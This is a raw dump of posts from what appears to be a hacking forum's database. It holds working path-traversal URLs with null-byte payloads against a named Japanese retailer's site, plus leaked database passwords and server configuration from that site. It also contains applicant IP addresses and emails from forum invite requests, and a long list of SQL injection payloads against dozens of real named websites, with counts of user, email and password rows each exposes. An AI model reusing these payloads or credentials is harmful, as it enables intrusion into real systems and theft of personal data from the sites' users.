\"/web/cgi-bin/\"\r\n\r\n PerlLoadModule Filters::UniGoogleAnalytics\r\n\r\n \r\n Options +Includes\r\n Options +ExecCGI\r\n AllowOverride All\r\n Order allow,deny\r\n Allow from all\r\n \r\n \r\n Options +Includes\r\n Options +ExecCGI\r\n AllowOverride All\r\n Order allow,deny\r\n Allow from all\r\n \r\n \r\n order deny,allow\r\n deny from all\r\n \r\n\r\n # --- esmart auth\r\n SetEnvIfNoCase User-Agent \"Googlebot\" ROBOT\r\n SetEnvIfNoCase User-Agent \"msnbot\" ROBOT\r\n SetEnvIfNoCase User-Agent \"Slurp\" ROBOT\r\n SetEnvIfNoCase Cookie \"afg=0\" ADULTONLY\r\n SetEnvIfNoCase Cookie \"afg=1\" ADULTONLY\r\n \r\n ErrorDocument 403 /esmart_auth/index.html\r\n Allow from env=ADULTONLY\r\n Allow from env=ROBOT\r\n Deny from All\r\n \r\n\r\n \r\n PerlOutputFilterHandler Filters::UniGoogleAnalytics\r\n \r\n\r\n ErrorLog \"|/opt/apache2/bin/rotatelogs /var/toralog/tra-w7s/error-%y-%m-%d-%p.log 43200 540\"\r\n CustomLog \"|/opt/apache2/bin/rotatelogs /var/toralog/tra-w7s/access-%y-%m-%d-%p.log 43200 540\" combined\r\n \r\n\r\n#-----------------------------------------------------------\r\n# www.toranoana.co.jp\r\n#-----------------------------------------------------------\r\n\r\n ServerAdmin webmaster@toranoana.co.jp\r\n DocumentRoot /web/htdocs_cojp\r\n ServerName www.toranoana.co.jp\r\n ServerAlias www.mirror.toranoana.co.jp\r\n ErrorDocument 401 /error/401.html\r\n ErrorDocument 403 /error/403.html\r\n ErrorDocument 404 /error/404.html\r\n ErrorDocument 500 /error/500.html\r\n ScriptAlias /cgi-bin/ \"/web/cgi-bin_cojp/\"\r\n\r\n PerlLoadModule Filters::UniGoogleAnalytics\r\n\r\n \r\n AllowOverride None\r\n Options None\r\n Order allow,deny\r\n Allow from all\r\n \r\n \r\n Options +Includes\r\n Options +ExecCGI\r\n AllowOverride All\r\n Order allow,deny\r\n Allow from all\r\n \r\n \r\n order deny,allow\r\n deny from all\r\n \r\n\r\n \r\n PerlOutputFilterHandler Filters::UniGoogleAnalytics\r\n \r\n\r\n ErrorLog \"|/opt/apache2/bin/rotatelogs /var/toralog/tra-w7s-cojp/error-%y-%m-%d.log 86400 540\"\r\n CustomLog \"|/opt/apache2/bin/rotatelogs /var/toralog/tra-w7s-cojp/access-%y-%m-%d.log 86400 540\" combined\r\n \r\n\r\n# --- end of config\r\n[/CODE]', 1, 1, '', 0, 2, 0, 0, 0),
(1770, 1083, 1768, 'ropertus', 33, '', 1408833031, '[QUOTE=BigBear;1768][url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../etc/passwd%00.jpg[/url]\r\n\r\n[url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../web/cgi-bin/login.cgi%00.jpg[/url]\r\n\r\nrequire \"/web/plib/R2/libcommon.pl\";\r\nrequire \"/web/plib/libenv.pl\";\r\nrequire \"/web/plib/libhtml.pl\";\r\nrequire \"/web/plib/R2/libcookie.pl\";\r\nrequire \"/web/plib/R2/libdatabase.pl\";\r\nrequire \"/web/plib/sql_regist.pl\";\r\nrequire \"/web/plib/libutil.pl\";\r\nrequire \"/web/plib/jcode.pl\";\r\nrequire \"/web/plib/librate.pl\";\r\nrequire \"/web/cgi-bin/get_hosp.pl\";\r\nrequire \"/web/cgi-bin/get_cgi_frame_templ.pl\";\r\n\r\n# $Id: libdatabase.pl 60 2005-07-07 11:58:38Z funa $ #\r\n\r\nmy $FMOS_IP=\"FMOS\";\r\nmy $FMOS_ID=\"ectora\";\r\nmy $FMOS_PW=\"ec2004\";\r\n\r\nmy $IMOS_IP=\"IMOS\";\r\nmy $IMOS_ID=\"ectora\";\r\nmy $IMOS_PW=\"ec2004\";\r\n\r\nmy $FMOSR_IP=\"FMOSR\";\r\nmy $FMOSR_ID=\"ectora\";\r\nmy $FMOSR_PW=\"ec2004\";[/QUOTE]\r\n\r\nYou can try poison error log here: [url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../../opt/apache2/logs/error_log%00[/url]\r\n\r\nHere is the apache config: [url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../../opt/apache2/conf/httpd.conf%00[/url]\r\n\r\nAnd here is vhosts config: [url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../../opt/apache2/conf/vhost.conf%00[/url]', 1, 1, '', 0, 1, 0, 0, 0),
(1771, 1568, 0, 'Invite', 2, '{$name}', 1408835460, '[SIZE=\'4\'][COLOR=\'Sienna\']xrahitel[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: xrahitel@exploit.im\n[b]e-mail[/b]: xrahitelserves@gmail.com\n[b]Info[/b]: was zanemalsya many fishinga,here are the sites where my publications\r\n\r\n https://exploit.in/forum/index.php?showuser=51843\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 83.149.48.68\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/a_hranit | http://vk.com/a_hranit \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1772, 1569, 0, 'Invite', 2, '{$name}', 1408843441, '[SIZE=\'4\'][COLOR=\'Sienna\']Hookedonirc[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: hookedonirc@gmail.com\n[b]Info[/b]: 20 years all aspects of IT, Security, Brain and wetware hacking. \r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 50.140.155.224\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://hookedonirc.blogspot.com | hookedonirc.blogspot.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1773, 1570, 0, 'Invite', 2, '{$name}', 1408868753, '[SIZE=\'4\'][COLOR=\'Sienna\']Naven[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: NONE\n[b]e-mail[/b]: naven@noreply.pl\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 89.74.202.96\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://naven.se | naven.se \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1774, 1571, 0, 'l3n0', 44, 'Random SQLi Website with Email password count', 1408885182, '[CODE]swimsa.co.za\r\nURL:http://www.swimsa.co.za/archive.asp?id=[t]\r\nMethod:MS SQL Error\r\nSearch:password\r\nRows:2\r\n[2] SwimSA.ssa_users\r\nTotal Rows:128\r\nSearch:user\r\nRows:126\r\n[104] SwimSA.ssa_votepolls\r\n[12] SwimSA.ssa_toolusers\r\n[8] SwimSA.ssa_photogalleries\r\n[2] SwimSA.ssa_users\r\n\r\nonlinegrapevine.com\r\nURL:http://onlinegrapevine.com/categorylist.asp?categoryID=40\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:207\r\n[141] onlinegrapevine.d_report\r\n[65] onlinegrapevine.d_vendor\r\n[1] onlinegrapevine.d_consumer\r\n\r\ncanuckrecruiter.com\r\nURL:https://www.canuckrecruiter.com/SearchJobsByCategory.asp?id=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:239\r\n[234] canuckrecruiter.jobs\r\n[3] canuckrecruiter.Administrators\r\n[2] canuckrecruiter.EmployerAgents\r\nTotal Rows:242\r\nSearch:admin\r\nRows:3\r\n[3] canuckrecruiter.Administrators\r\nTotal Rows:247\r\nSearch:password\r\nRows:5\r\n[3] canuckrecruiter.Administrators\r\n[2] canuckrecruiter.EmployerAgents\r\n\r\nwplrc.com\r\nURL:http://wplrc.com/home.asp?id=41\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:664\r\n[150] wplrc.wp_member\r\n[139] wplrc.wp_college\r\n[132] wplrc.wp_email\r\n[115] wplrc.wp_article\r\n[99] wplrc.wp_registration\r\n[13] wplrc.wp_event\r\n[12] wplrc.wp_location\r\n[4] wplrc.wp_user\r\nTotal Rows:917\r\nSearch:password\r\nRows:253\r\n[150] wplrc.wp_member\r\n[99] wplrc.wp_registration\r\n[4] wplrc.wp_user\r\nTotal Rows:1,080\r\nSearch:user\r\nRows:163\r\n[115] wplrc.wp_article\r\n[44] wplrc.wp_curriculum\r\n[4] wplrc.wp_user\r\n\r\ncalcalit-tamar.co.il\r\nURL:http://www.calcalit-tamar.co.il/index.asp?id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:369\r\n[301] scool_yamm.Forum\r\n[35] scool_yamm.tblForumMessages\r\n[30] scool_yamm.tblStudent\r\n[3] scool_yamm.clientBag\r\nTotal Rows:411\r\nSearch:admin\r\nRows:42\r\n[35] scool_yamm.tblForumMessages\r\n[7] scool_yamm.tblForumList\r\nTotal Rows:508\r\nSearch:user\r\nRows:97\r\n[62] scool_yamm.Users\r\n[35] scool_yamm.tblForumMessages\r\n\r\nfellston.com\r\nURL:http://www.fellston.com/category.asp?id=[t]\r\nMethod:MS SQL Error\r\nSearch:admin\r\nRows:22\r\n[22] marketing.EC_COUPON_T\r\nTotal Rows:25\r\nSearch:password\r\nRows:3\r\n[3] marketing.MT_USER_T\r\nTotal Rows:655\r\nSearch:user\r\nRows:630\r\n[630] marketing.EC_DISTRIBUTORS_T\r\n\r\nacheipuzzles.com\r\nURL:http://acheipuzzles.com/products.asp?keyword=digite a palavra chave\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:7,343\r\n[7,316] acheipuzzlesdb.customers\r\n[17] acheipuzzlesdb.ordertracking\r\n[9] acheipuzzlesdb.shoprma\r\n[1] acheipuzzlesdb.mycompany\r\nTotal Rows:7,345\r\nSearch:admin\r\nRows:2\r\n[2] acheipuzzlesdb.tbluser\r\nTotal Rows:14,663\r\nSearch:password\r\nRows:7,318\r\n[7,316] acheipuzzlesdb.customers\r\n[2] acheipuzzlesdb.tbluser\r\nTotal Rows:26,511\r\nSearch:user\r\nRows:11,848\r\n[7,316] acheipuzzlesdb.customers\r\n[4,531] acheipuzzlesdb.tbllog\r\n[1] acheipuzzlesdb.ups_config\r\n\r\nzf3d.com\r\nURL:http://www.zf3d.com/Products.asp?Id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:152,824\r\n[143,892] zf3ddate.Tx_User\r\n[8,522] zf3ddate.zuopin\r\n[253] zf3ddate.Tx_Guest\r\n[156] zf3ddate.zp_gstj\r\n[1] zf3ddate.Tx_Const\r\nTotal Rows:177,355\r\nSearch:admin\r\nRows:24,531\r\n[24,276] zf3ddate.Tx_Cret\r\n[253] zf3ddate.Tx_Guest\r\n[2] zf3ddate.Tx_Admin\r\nTotal Rows:9,080,347\r\nSearch:user\r\nRows:8,902,992\r\n[5,983,873] zf3ddate.henji\r\n[2,307,339] zf3ddate.guankan\r\n[143,892] zf3ddate.Tx_User\r\n[97,433] zf3ddate.Tx_Bbs\r\n[85,596] zf3ddate.tuijian\r\n[71,154] zf3ddate.shipin_guankan\r\n[62,860] zf3ddate.liulan\r\n[39,373] zf3ddate.rw_tj\r\n[33,873] zf3ddate.yh_kwkc\r\n[24,276] zf3ddate.Tx_Cret\r\n[16,531] zf3ddate.shoushuo\r\n[11,467] zf3ddate.Tx_News\r\n[8,522] zf3ddate.zuopin\r\n[6,402] zf3ddate.renwu_gzd\r\n[5,426] zf3ddate.zhifu\r\n[2,149] zf3ddate.Tx_xilie\r\n[699] zf3ddate.map\r\n[655] zf3ddate.rc_grtj\r\n[503] zf3ddate.huiyuan_pinglun\r\n[379] zf3ddate.zp_zwyq\r\n[253] zf3ddate.Tx_Guest\r\n[156] zf3ddate.zp_gstj\r\n[143] zf3ddate.mubiao\r\n[36] zf3ddate.Tx_Board\r\n[2] zf3ddate.Tx_Admin\r\n\r\ntruckcarsrv.com\r\nURL:http://www.truckcarsrv.com/usedrvs/view_rv_details.php?MID=999999.9\' union all select 1,2,3,4,5,6,7,8,9,10,11,[t],13,14,15,16,17,18,19,20,21,22,23,24,25 and \'0\'=\'0\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:177,995\r\n[175,352] remarkab_wrdp1.wp_tml_emails\r\n[2,642] remarkab_wrdp1.wp_comments\r\n[1] remarkab_wrdp1.wp_users\r\nTotal Rows:179,138\r\nSearch:password\r\nRows:1,143\r\n[1,143] remarkab_wrdp1.wp_posts\r\nTotal Rows:181,806\r\nSearch:user\r\nRows:2,668\r\n[2,642] remarkab_wrdp1.wp_comments\r\n[24] remarkab_wrdp1.wp_usermeta\r\n[1] remarkab_wrdp1.user\r\n[1] remarkab_wrdp1.wp_users\r\n\r\nexpropriationlaw.ca\r\nURL:http://www.expropriationlaw.ca/news/news.asp?id=999999.9 union all select 1,2,[t],4,5\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:2,734\r\n[2,038] jbm_exlaw1.t600_ads\r\n[328] jbm_exlaw1.t300\r\n[184] jbm_exlaw1.t202\r\n[181] jbm_exlaw1.t_directory\r\n[1] jbm_exlaw1.t203\r\n[1] jbm_exlaw1.t305\r\n[1] jbm_exlaw1.t601_ad_settings\r\nTotal Rows:2,737\r\nSearch:admin\r\nRows:3\r\n[1] jbm_exlaw1.t203\r\n[1] jbm_exlaw1.t305\r\n[1] jbm_exlaw1.t601_ad_settings\r\nTotal Rows:2,939\r\nSearch:password\r\nRows:202\r\n[200] jbm_exlaw1.t502_subscribers\r\n[1] jbm_exlaw1.t203\r\n[1] jbm_exlaw1.t601_ad_settings\r\nTotal Rows:9,056\r\nSearch:user\r\nRows:6,117\r\n[3,236] jbm_exlaw1.t100\r\n[2,038] jbm_exlaw1.t600_ads\r\n[328] jbm_exlaw1.t300\r\n[200] jbm_exlaw1.t502_subscribers\r\n[181] jbm_exlaw1.t_directory\r\n[132] jbm_exlaw1.t304\r\n[1] jbm_exlaw1.t203\r\n[1] jbm_exlaw1.t601_ad_settings\r\n\r\nmapsinternational.co.uk\r\nURL:http://www.mapsinternational.co.uk/product_details.asp?id=94 or 1=[t] and 1=1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:204,781\r\n[68,609] mapsinter.transaction_view\r\n[64,460] mapsinter.transactions_userdetails\r\n[63,257] mapsinter.users\r\n[3,846] mapsinter.grouponcanvasorders\r\n[1,636] mapsinter.grouponorders\r\n[1,252] mapsinter.grouponordersbu\r\n[853] mapsinter.micompetition\r\n[483] mapsinter.productreviews\r\n[176] mapsinter.kgborders\r\n[132] mapsinter.lsdoodleorders\r\n[33] mapsinter.littlebirdorders\r\n[26] mapsinter.mios_resellers\r\n[15] mapsinter.savvymummysorders\r\n[3] mapsinter.mios_login\r\nTotal Rows:331,902\r\nSearch:admin\r\nRows:127,121\r\n[68,609] mapsinter.transaction_view\r\n[58,512] mapsinter.schools\r\nTotal Rows:331,911\r\nSearch:password\r\nRows:9\r\n[6] mapsinter.admin\r\n[3] mapsinter.mios_users\r\nTotal Rows:401,425\r\nSearch:user\r\nRows:69,514\r\n[68,609] mapsinter.transaction_view\r\n[874] mapsinter.mios_quotes\r\n[23] mapsinter.mios_clients\r\n[6] mapsinter.admin\r\n[2] mapsinter.returns\r\n\r\nengex-uk.co.uk\r\nURL:http://www.engex-uk.co.uk/product-details.asp?productID=32\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:password\r\nRows:4\r\n[1] cefdb.addvent_login\r\n[1] cefdb.challenger_login\r\n[1] cefdb.engex_login\r\n[1] cefdb.heatstore_login\r\nTotal Rows:11\r\nSearch:user\r\nRows:7\r\n[1] cefdb.addvent_login\r\n[1] cefdb.avs_login\r\n[1] cefdb.challenger_login\r\n[1] cefdb.emitex_login\r\n[1] cefdb.engex_login\r\n[1] cefdb.ethos_login\r\n[1] cefdb.heatstore_login\r\n\r\nmarketindia.com\r\nURL:http://marketindia.com/show_item_details.asp?item_id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:9,794\r\n[4,962] marketi_bsh.orders\r\n[2,696] marketi_bsh.user_info\r\n[2,136] marketi_bsh.solicitation\r\nTotal Rows:12,490\r\nSearch:password\r\nRows:2,696\r\n[2,696] marketi_bsh.user_info\r\n\r\nmedguard.net\r\nURL:http://www.medguard.net/store/search_results.asp?txtsearchParamCat=[t]&txtsearchParamType=ALL&txtsearchParamMan=ALL&txtsearchParamVen=ALL&iLevel=1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:1,665\r\n[865] medguard.sfCShipAddresses\r\n[795] medguard.sfCustomers\r\n[2] medguard.sfAffiliates\r\n[1] medguard.sfAdmin\r\n[1] medguard.sfManufacturers\r\n[1] medguard.sfVendors\r\nTotal Rows:1,666\r\nSearch:admin\r\nRows:1\r\n[1] medguard.sfAdmin\r\nTotal Rows:1,669\r\nSearch:password\r\nRows:3\r\n[2] medguard.sfAffiliates\r\n[1] medguard.sfAdmin\r\nTotal Rows:1,670\r\nSearch:user\r\nRows:1\r\n[1] medguard.sfAdmin\r\n\r\npeacehospice.co.uk\r\nURL:http://peacehospice.co.uk/viewevent.asp?eventID=387\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:5,739\r\n[3,370] peacehospicenew.tblorders\r\n[1,005] peacehospicenew.form_teamemail\r\n[446] peacehospicenew.news\r\n[423] peacehospicenew.event\r\n[198] peacehospicenew.vsp\r\n[104] peacehospicenew.job\r\n[80] peacehospicenew.lol_ceremony\r\n[71] peacehospicenew.ecard_creates\r\n[34] peacehospicenew.shopvsp\r\n[7] peacehospicenew.ecard_registrations\r\n[1] peacehospicenew.lol_settings\r\nTotal Rows:5,767\r\nSearch:password\r\nRows:28\r\n[21] peacehospicenew.security\r\n[7] peacehospicenew.ecard_registrations\r\nTotal Rows:8,125\r\nSearch:user\r\nRows:2,358\r\n[2,337] peacehospicenew.logged\r\n[21] peacehospicenew.security\r\n\r\ntavlit.co.il\r\nURL:http://www.tavlit.co.il/index.asp?module=catalog&item_id=50¤t_product=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:139\r\n[123] tavlit.Members\r\n[14] tavlit.Contact\r\n[2] tavlit.Users\r\nTotal Rows:141\r\nSearch:admin\r\nRows:2\r\n[2] tavlit.Users\r\nTotal Rows:266\r\nSearch:password\r\nRows:125\r\n[123] tavlit.Members\r\n[2] tavlit.Users\r\nTotal Rows:405\r\nSearch:user\r\nRows:139\r\n[123] tavlit.Members\r\n[14] tavlit.Contact\r\n[2] tavlit.Users\r\n\r\nrcatelecanada.com\r\nURL:http://www.rcatelecanada.com/item.asp?itemnmbr=RLC2253A\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:962\r\n[962] CI.RM00101\r\nTotal Rows:762,976\r\nSearch:user\r\nRows:762,014\r\n[694,779] CI.X_Curt_Log\r\n[53,786] CI.X_Curt_Performance\r\n[5,071] CI.X_Curt_OrderHistory_Web\r\n[3,897] CI.X_Curt_Available_Records_Web\r\n[3,518] CI.X_Curt_OrderReports\r\n[962] CI.RM00101\r\n[1] CI.XTest\r\n\r\nanntonys.com\r\nURL:http://www.anntonys.com/shop.asp?cat=11\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:26,746\r\n[26,311] anntonys.requestinfo\r\n[435] anntonys.orders_category\r\n\r\nborimpress.com\r\nURL:http://www.borimpress.com/event/2011/bookView.asp?bookid=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:123,470\r\n[60,268] borimpress.mailing_member\r\n[28,952] borimpress.t_user\r\n[9,580] borimpress.t_shop_order\r\n[6,920] borimpress.S_BBS_COMMON_1\r\n[4,487] borimpress.saveaddress\r\n[2,296] borimpress.t_bbs\r\n[2,220] borimpress.t_portfolio\r\n[1,724] borimpress.jrgSend\r\n[1,226] borimpress.crm\r\n[902] borimpress.S_BBS_COMMON_13\r\n[881] borimpress.S_BBS_COMMON_14\r\n[655] borimpress.t_request\r\n[496] borimpress.t_notice\r\n[493] borimpress.t_author\r\n[426] borimpress.S_BBS_COMMON_10\r\n[317] borimpress.mail_01\r\n[232] borimpress.S_BBS_COMMON_4\r\n[227] borimpress.studio2012\r\n[176] borimpress.t_reporter_info\r\n[126] borimpress.S_BBS_COMMON_8\r\n[119] borimpress.S_BBS_COMMON_12\r\n[114] borimpress.t_media_info\r\n[110] borimpress.S_BBS_COMMON_9\r\n[108] borimpress.S_BBS_COMMON_15\r\n[83] borimpress.t_misprint\r\n[66] borimpress.mail_picup1\r\n[63] borimpress.S_BBS_COMMON_3\r\n[53] borimpress.S_BBS_COMMON_11\r\n[30] borimpress.b_user\r\n[26] borimpress.S_BBS_COMMON_7\r\n[25] borimpress.BAS_news\r\n[25] borimpress.S_BBS_COMMON_6\r\n[24] borimpress.S_BBS_COMMON_5\r\n[9] borimpress.S_BBS_COMMON_2\r\n[3] borimpress.momsclass_mailing\r\n[3] borimpress.test\r\n[1] borimpress.BAS_User\r\n[1] borimpress.em_member\r\n[1] borimpress.p_admin\r\n[1] borimpress.t_event\r\n[1] borimpress.t_newpart_bbs\r\nTotal Rows:125,847\r\nSearch:admin\r\nRows:2,377\r\n[2,282] borimpress.shortcomment\r\n[60] borimpress.bookconsult\r\n[23] borimpress.member\r\n[10] borimpress.t_admin\r\n[1] borimpress.go_admin\r\n[1] borimpress.p_admin\r\nTotal Rows:142,812\r\nSearch:user\r\nRows:16,965\r\n[9,580] borimpress.t_shop_order\r\n[4,487] borimpress.saveaddress\r\n[1,378] borimpress.t_reply\r\n[951] borimpress.t_shop_product_cart\r\n[476] borimpress.t_newbook_member\r\n[53] borimpress.pic1\r\n[19] borimpress.oe_user\r\n[10] borimpress.myset_apply\r\n[8] borimpress.chekgrim_qna\r\n[1] borimpress.basAdmin\r\n[1] borimpress.BasReviews\r\n[1] borimpress.t_newpart\r\n\r\nthebasketballacademy.com\r\nURL:https://www.thebasketballacademy.com/about.asp?id=175&PID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:45,115\r\n[45,109] tnba_new.Campers\r\n[6] tnba_new.Clients\r\nTotal Rows:45,121\r\nSearch:password\r\nRows:6\r\n[6] tnba_new.Clients\r\nTotal Rows:45,256\r\nSearch:user\r\nRows:135\r\n[44] tnba_new.playerpictureslookup\r\n[41] tnba_new.player\r\n[40] tnba_new.playerpictures\r\n[6] tnba_new.playerposition\r\n[4] tnba_new.playerlevel\r\n\r\naudiovisualsecurity.org.uk\r\nURL:http://www.audiovisualsecurity.org.uk/product-details.asp?productID=71\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:password\r\nRows:4\r\n[1] cefdb.addvent_login\r\n[1] cefdb.challenger_login\r\n[1] cefdb.engex_login\r\n[1] cefdb.heatstore_login\r\nTotal Rows:11\r\nSearch:user\r\nRows:7\r\n[1] cefdb.addvent_login\r\n[1] cefdb.avs_login\r\n[1] cefdb.challenger_login\r\n[1] cefdb.emitex_login\r\n[1] cefdb.engex_login\r\n[1] cefdb.ethos_login\r\n[1] cefdb.heatstore_login\r\n\r\nbrussellstribunal.org\r\nURL:http://www.brussellstribunal.org/article_view.asp?id=999999.9 union all select 1,2,3,4,5,6,[t],8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32\r\nMethod:MySQL Union\r\nSearch:user\r\nRows:634\r\n[634] bt.bt_users\r\n\r\nco.manitowoc.wi.us\r\nURL:http://www.co.manitowoc.wi.us/department/services.asp?ID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:562\r\n[310] ManitowocCounty.StaffMember\r\n[122] ManitowocCounty.SignupPress\r\n[77] ManitowocCounty.Contact\r\n[28] ManitowocCounty.Director\r\n[25] ManitowocCounty.Supervisor\r\nTotal Rows:614\r\nSearch:admin\r\nRows:52\r\n[52] ManitowocCounty.Member\r\nTotal Rows:666\r\nSearch:password\r\nRows:52\r\n[52] ManitowocCounty.Member\r\nTotal Rows:799\r\nSearch:user\r\nRows:133\r\n[52] ManitowocCounty.Member\r\n[46] ManitowocCounty.SecurityRights\r\n[35] ManitowocCounty.BusSecurityRights\r\n\r\nboatplans.dk\r\nURL:http://www.boatplans.dk/boat_plans.asp?id=45999999.9\' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14 and \'0\'=\'0\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:17,164\r\n[7,971] boatplans.newsletter\r\n[6,536] boatplans.temptab\r\n[1,387] boatplans.kunder\r\n[453] boatplans.oldsub\r\n[313] boatplans.2co_kunder\r\n[228] boatplans.ppordre\r\n[192] boatplans.dlog\r\n[58] boatplans.2co_member\r\n[14] boatplans.temp_member\r\n[12] boatplans.mobi_kunder\r\n\r\nblackhatpersuasion.com\r\nURL:http://blackhatpersuasion.com/order.asp?id=111\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:29\r\n[29] instantcontent_blackhat.members\r\nTotal Rows:58\r\nSearch:password\r\nRows:29\r\n[29] instantcontent_blackhat.members\r\nTotal Rows:87\r\nSearch:user\r\nRows:29\r\n[29] instantcontent_blackhat.members\r\n\r\nalfenashoje.com.br\r\nURL:http://www.alfenashoje.com.br/resultado_promo.asp?id=999999.9 union all select 1,2,3,4,[t],6,7,8,9,10\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:119,197\r\n[83,400] alfenashoje.noticias_comentarios\r\n[26,450] alfenashoje.participantes\r\n[5,044] alfenashoje.newsletter\r\n[1,719] alfenashoje.mural\r\n[1,417] alfenashoje.assinantes\r\n[522] alfenashoje.obituarios_comentarios\r\n[385] alfenashoje.achadoseperdidos\r\n[199] alfenashoje.comercios\r\n[31] alfenashoje.albuns_comentarios\r\n[17] alfenashoje.boca\r\n[13] alfenashoje.funcionarios\r\n\r\ndev2.re-al.co.za\r\nURL:http://dev2.re-al.co.za/panga/asp/cart/addcart.asp?pid=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:7,021\r\n[2,966] Macbryan.User\r\n[2,431] Macbryan.data_markex\r\n[1,624] 